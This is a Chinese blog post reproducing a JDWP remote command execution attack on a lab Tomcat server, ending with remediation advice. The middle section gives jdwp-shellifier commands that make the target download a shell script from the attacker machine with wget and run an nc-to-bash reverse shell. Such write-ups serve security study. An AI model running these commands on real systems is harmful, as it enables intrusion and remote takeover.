【漏洞复现】JDWP远程命令执行漏洞

最新推荐文章于 2024-05-17 09:48:52 发布
最新推荐文章于 2024-05-17 09:48:52 发布
阅读量6k 收藏 9
点赞数 2
分类专栏: 漏洞复现验证 文章标签: JDWP RCE debug
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43486390/article/details/114259762
版权

0x01 简介

JPDA(Java Platform Debugger Architecture):即Java平台调试体系架构。Java虚拟机设计的专门的API接口供调试和监控虚拟机使用。

JPDA按照抽象层次,又分为三层,分别是:

  • JVM TI(Java VM Tool Interface):虚拟机对外暴露的接口,包括debug和profile。
  • JDI(Java Debug Interface):Java库接口,实现了JDWP协议的客户端,调试器可以用来和远程被调试应用通信。
  • JDWP(Java DEbugger Wire Protocol):即Java调试线协议,是一个为Java调试而设计的通讯交互协议,它定义了调试器和被调试程序之间传递的信息的格式。说白了就是JVM或者类JVM的虚拟机都支持一种协议,通过该协议,Debugger 端可以和 target VM 通信,可以获取目标 VM的包括类、对象、线程等信息,在调试Android应用程序这一场景中,Debugger一般是指你的 develop machine 的某一支持 JDWP协议的工具例如 Android Studio 或者 JDB,而 Target JVM是指运行在你mobile设备当中的各个App(因为它们都是一个个虚拟机 Dalvik 或者 ART),JDWP Agent一般负责监听某一个端口,当有 Debugger向这一个端口发起请求的时候,Agent 就转发该请求给 target JVM并最终由该 JVM 来处理请求,并把 reply 信息返回给 Debugger 端。

0x02 环境搭建

靶机:192.168.178.128(centos)
攻击机:192.168.178.129(kali)

1、Centos安装tomcat
Tomcat官网下载https://tomcat.apache.org/download-70.cgi,Tomcat 有一键安装版和解压版,要搭建jdwp环境只能使用解压版。
在这里插入图片描述2、解压安装tomcat

tar -zxvf apache-tomcat-7.0.108.tar.gz
mkdir /opt/tomcat
mv apache-tomcat-7.0.108 /opt/tomcat/

3、修改配置文件

cd /opt/tomcat/apache-tomcat-7.0.108/bin
vim catalina.sh
//在首行添加:
CATALINA_OPTS="-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000"

连接方式有两种,为dt_shmem和dt_socket,分别表示本机调试和远程调试。address=8000 代表开启8000端口作为远程调试端口。./startup.sh启动tomcat。
在这里插入图片描述4、在windows上通过jdb连接debug模式的tomcat
jdb.exe -connect com.sun.jdi.SocketAttach:hostname=192.168.178.128,port=8000
在这里插入图片描述

0x03 漏洞复现

1、简单验证
telnet端口,如果返回JDWP-Handshake,即表示存在漏洞。

2、POC
(1)poc下载地址:https://github.com/IOActive/jdwp-shellifier
(2)该漏洞无回显,可利用dnslog进行探测
python2 jdwp-shellifier.py -t 192.168.3.118 -p 8787 --break-on "java.lang.String.indexof" --cmd "ping xxx.dnslog.cn"
在这里插入图片描述3、反弹shell

下面内容均在攻击机上操作:

(1)准备反弹shell文件,保存为shell.txt
nc 192.168.178.129 3333 | /bin/bash | nc 192.168.178.129 4444%

(2)进入到有shell文件的目录下,终端开启简单http协议,使得靶机可以下载shell文件
python3 -m http.server 8000

(3)开启监听,需要开启2个监听,前面一个输入执行命令,后面一个输出命令执行结果

nc -lvvp 3333
nc -lvvp 4444

(4)利用POC执行命令,下载shell、文件可执行权限、执行shell

python2 jdwp-shellifier.py -t 192.168.178.128 -p 8000 --break-on "java.lang.String.indexof" --cmd "wget http://192.168.178.129:8000/shell.txt -O /tmp/shell.sh"
python2 jdwp-shellifier.py -t 192.168.178.128 -p 8000 --break-on "java.lang.String.indexof" --cmd "chmod a+x /tmp/shell.sh"
python2 jdwp-shellifier.py -t 192.168.178.128 -p 8000 --break-on "java.lang.String.indexof" --cmd "/tmp/shell.sh"

(5)两个监听都收到shell,一个输入命令,一个输出结果
在这里插入图片描述

0x04 修复建议

(1)关闭JDWP端口,或者JDWP端口不对公网开放
(2)关闭Java的debug模式

ps_x
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JDWP原理分析与漏洞利用
liudong200618的博客
01-26 1241
JDWP(Java DEbugger Wire Protocol):即Java调试线协议,是一个为Java调试而设计的通讯交互协议,它定义了调试器和被调试程序之间传递的信息的格式。
JDWP 远程命令执行漏洞
热门推荐
Brucetg的博客
09-20 2万+
0x01. Java 调试体系JPDA简介 JPDA(Java Platform Debugger Architecture):即Java平台调试体系架构。Java虚拟机设计的专门的API接口供调试和监控虚拟机使用 JPDA按照抽象层次,又分为三层,分别是: JVM TI(Java VM Tool Interface):虚拟机对外暴露的接口,包括debug和profile。 JDWP(Java ...
浅析JDWP远程命令执行漏洞 [ Mi1k7ea ]1
08-03
2022/3/2 下午8:30浅析JDWP远程命令漏洞 [ Mi1k7ea ]https://www.mi1k7ea.com/2021/08/06/浅析JDW
探索JDWP漏洞利用:JDWP-shellifier脚本
最新发布
gitblog_00020的博客
05-17 443
探索JDWP漏洞利用:JDWP-shellifier脚本 项目地址:https://gitcode.com/IOActive/jdwp-shellifier 项目简介 JDWP-shellifier 是一个由安全研究人员开发的渗透测试工具,旨在针对运行中的JDWP(Java Debug Wire Protocol)服务进行远程代码执行攻击。这个开源项目提供了一种简便的方法,让安全专业人员能够评估和...
使用 JDWP 进行远程调试
weixin_33716557的博客
10-08 751
对于调试Java程序来说,Java Debug Wire Protocol (JDWP, Java调试线协议)是不可多得的好东西。 使用JDWP调试应用程序的步骤如下: 1. 打开命令行,并将 jdk 安装路径下的 bin 目录添加到 PATH 环境变量。 2. 通过以下命令来启动想要调试的程序(本例中假设为Test)...
java JDWP调试接口任意命令执行漏洞
tangshuangsss的专栏
12-16 5562
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介JDWP(Java DEbugger Wire Protocol):即Java调试线协议,是一个为Java...
远程命令执行漏洞
08-10
NULL 博文链接:https://crabdave.iteye.com/blog/2211641
JDWP 远程命令执行 检查工具
04-26
JDWP 远程命令执行检查工具,JDWP(Java DEbugger Wire Protocol):即Java调试线协议,是一个为Java调试而设计的通讯交互协议,它定义了调试器和被调试程序之间传递的信息的格式。说白了就是JVM或者类JVM的虚拟机都支持一种协议,通过该协议,Debugger 端可以和 target VM 通信,可以获取目标 VM的包括类、对象、线程等信息,在调试Android应用程序这一场景中,Debugger一般是指你的 develop machine 的某一支持 JDWP协议的工具例如 Android Studio 或者 JDB,而 Target JVM是指运行在你mobile设备当中的各个App(因为它们都是一个个虚拟机 Dalvik 或者 ART),JDWP Agent一般负责监听某一个端口,当有 Debugger向这一个端口发起请求的时候,Agent 就转发该请求给 target JVM并最终由该 JVM 来处理请求,并把 reply 信息返回给 Debugger 端。
JDWP远程命令执行
自强不息
08-07 261
活包含着更广阔的意义,而不在于我们实际得到了什么;关键是我们的心灵是否充实。对于生活理想,应该象宗教徒对待宗教一样充满虔诚与热情!
jdwp命令执行
公众号shadow sock7
10-18 8415
利用脚本: https://github.com/IOActive/jdwp-shellifier 命令成功执行 用wireshark抓包发现
致远OA-A8系统的0day远程命令执行的实战-附件资源
03-05
致远OA-A8系统的0day远程命令执行的实战-附件资源
基于 jdwp-shellifier 的进阶JDWP漏洞利用脚本(动态执行Java_Js代码并获得回显).zip
02-07
python chatgpt
web漏洞挖掘经验.pdf
12-12
* 未授权/命令执行类/漏洞:1099、rmi、8000、jdwp、java 调试接口命令执行等。 Web 漏洞挖掘需要对目标进行全面信息收集,包括域名信息、子域名信息、敏感信息、敏感文件、敏感目录、Email 收集、IP 段信息收集、...
IDEA远程调试与JDWP调试端口RCE漏洞
道阻且长,行则将至。
12-10 949
在对一些 Java CVE 漏洞的调试分析过程中,本地 IDEA 搭建漏洞环境的话既麻烦又不安全,这个时候如果能直接在虚拟机运行 Vulhub 提供的 Docker 靶场并使用物理机 IDEA 对其进行远程调试,那么这项工作就显得安全便捷了。本文来学习下如何通过 IDEA 远程调试远程 Docker 服务的靶场环境,同时学习此类调试环境衍生的服务器安全风险——JDWP调试接口对外开放导致RCE漏洞
JDWP漏洞验证
anan的博客
04-06 3256
前言 JDWP 是 Java Debug Wire Protocol 的缩写,它定义了调试器(debugger)和被调试的 Java 虚拟机(target vm)之间的通信协议。 JDWP就是JAVA的一个调试协议。本质上我们通过IDEA或者eclipse通过断点的方式调试JAVA应用时,使用的就是JDWP。因为是调试协议,不可能带有认证信息,那么对于一个开启了调试端口的JAVA应用,我们就可能利用JDWP进行调试,最终执行命令。在什么时候会使用到JDWP这种协议呢?比如你在线上跑了一个应用,但是这个问题只
SpringBoot(三) JDWP远程调用
qq_34041723的博客
04-13 879
在 SpringBoot 系列的第二篇文章中,已经详细分析了 SpringBoot 的启动过程,那么这篇文章,我们通过源码调试的方式来验证我们的分析,首先我们在控制台中输入 java 命令,可用输出 JDK 给我们提供了一些命令,其中-agentlib命令就是本篇文章所介绍,用于我们进行源码调试 我们继续查看-agentlib详细的命令说明,输入java -agentlib:jdwp=help 查看帮助文档 远程 # 在远程机器上添加代理模式的方式启动 # 使用 socket 协议来进行远程调试,当服务
Java Debugger JDWP Agent Library
tterminator的专栏
08-02 1501
一、调出帮助信息在终端下执行如下命令: java -agentlib:jdwp=help二、具体帮助信息 Java Debugger JDWP Agent Library -------------------------------- (see http://java.sun.com/products/jpda for more inf
JDWP命令行调试
谢彦的技术博客
05-27 5447
JDWP用于在java程序层面的调试,当然也可以在eclipse中使用,或利用ddms调试
JDWP 服务
06-01
JDWP(Java Debug Wire Protocol)是一种用于Java虚拟机(JVM)调试的网络协议,它允许开发人员通过调试器与运行中的Java应用程序交互。JDWP服务是Java虚拟机中实现JDWP协议的服务。 JDWP服务提供了以下功能: 1. 断点设置和删除 2. 单步执行代码 3. 监视变量和表达式 4. 检查线程状态 5. 读取和更改变量的值 6. 读取和更改类信息 要使用JDWP服务,您需要启动Java虚拟机时打开调试端口,并在调试器中连接该端口。以下是启动Java虚拟机时启用JDWP服务的示例命令: ``` java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=8000 HelloWorld ``` 在该命令中,-agentlib:jdwp是用于启用JDWP服务的参数,transport指定传输协议(dt_socket),server指定是作为服务端(y)还是客户端(n),suspend指定是否在启动时挂起应用程序(n),address指定调试端口号(8000)。 在调试器中连接JDWP服务时,您需要指定相同的传输协议和调试端口号。例如,如果您使用Eclipse调试器,可以在“Debug Configurations”中添加一个“Remote Java Application”配置,然后指定传输协议和调试端口号即可连接JDWP服务。 总之,JDWP服务是一种用于Java虚拟机调试的网络协议,通过启动Java虚拟机时打开调试端口并在调试器中连接该端口,您可以使用JDWP服务进行应用程序调试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值